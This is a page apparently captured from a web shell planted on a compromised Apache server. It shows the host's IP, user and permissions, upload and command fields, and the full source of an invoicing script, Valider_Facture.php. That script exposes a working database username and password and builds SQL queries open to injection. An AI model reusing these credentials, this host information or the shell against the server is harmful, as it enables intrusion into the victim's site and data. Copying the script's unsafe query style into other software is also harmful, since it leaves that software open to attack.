403Webshell
Server IP : 167.99.254.82  /  Your IP : 216.73.216.231
Web Server : Apache
System : Linux host.techisquad.com 5.15.0-187-generic #197-Ubuntu SMP Fri Jul 17 19:17:01 UTC 2026 x86_64
User : pawluxera ( 1011)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/factures/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/factures/public_html/Valider_Facture.php
<?php
session_start();
if (!isset($_SESSION['compte_user']))
{
header('Location: erreur_surfing.html');
exit();
}
if (!isset($_SESSION['r_facture']))
{
header('Location: Factures.php');
exit();
}
$link = mysqli_connect("localhost",  "advery", "EoM6IJlnirGIfcu","factures") or die("Impossible de se connecter : " . mysqli_error());
//Test QTE STOCK
$Erreur = 'NON';
$repd = "select * from factures where ref_facture = '$_SESSION[r_facture]';";
$execd = mysqli_query($link,$repd);
$numd = mysqli_fetch_assoc($execd);
if ($numd['refe_devis'] == '0')
	$repd1 = "select * from detail_devis where ref_devis = '$_SESSION[r_facture]' ";
else
	$repd1 = "select * from detail_devis where ref_devis = '$numd[refe_devis]' ";
	
$execd1 = mysqli_query($link,$repd1);
while ($rowasa1 = mysqli_fetch_assoc($execd1)) {
	$rear = "select * from article_service where id_art_serv = $rowasa1[ref_as];";
	$exear = mysqli_query($link,$rear);
	$numar = mysqli_fetch_assoc($exear);
	if ( $numar['type_as']== 'Article' )
	{
		if ( $rowasa1[qte] > $numar[qte_stock] )
		{
			$Erreur = 'OUI';
		}
		else
		{
			$diff = $numar[qte_stock] - $rowasa1[qte];
			$reponse = "UPDATE  article_service SET qte_stock = $diff where id_art_serv = $numar[id_art_serv] ;";
			mysqli_query($link,$reponse);
		}	
	}	
}
if ( $Erreur == 'OUI' )
{
header('Location: Erreur_stk_facture.html');
exit();
}
else
{
$reponse = "UPDATE  factures SET etat_facture = 'Valide' where ref_facture = '$_SESSION[r_facture]' ;";
mysqli_query($link,$reponse);

$b = date('H:i');
$c = date('d-m-Y');
$dt = $c . ' [ '. $b . ' ]';
$reponse = "select * from comptes_user where id_clt = $_SESSION[compte_user] ;";
$exec =mysqli_query($link,$reponse);
$row = mysqli_fetch_assoc($exec);
$a = $row['nom'].' vient de valider une Facture : '.$_SESSION['r_facture'];
$reponse = "INSERT INTO notification VALUES(id_notif ,'dripicons-user-group','$a' ,'$dt', 'ADMIN');";
mysqli_query($link,$reponse);

header('Location: Detail-Facture.php');
exit();
}
mysql_close($link);

 
?>

Youez - 2016 - github.com/yon3zu
LinuXploit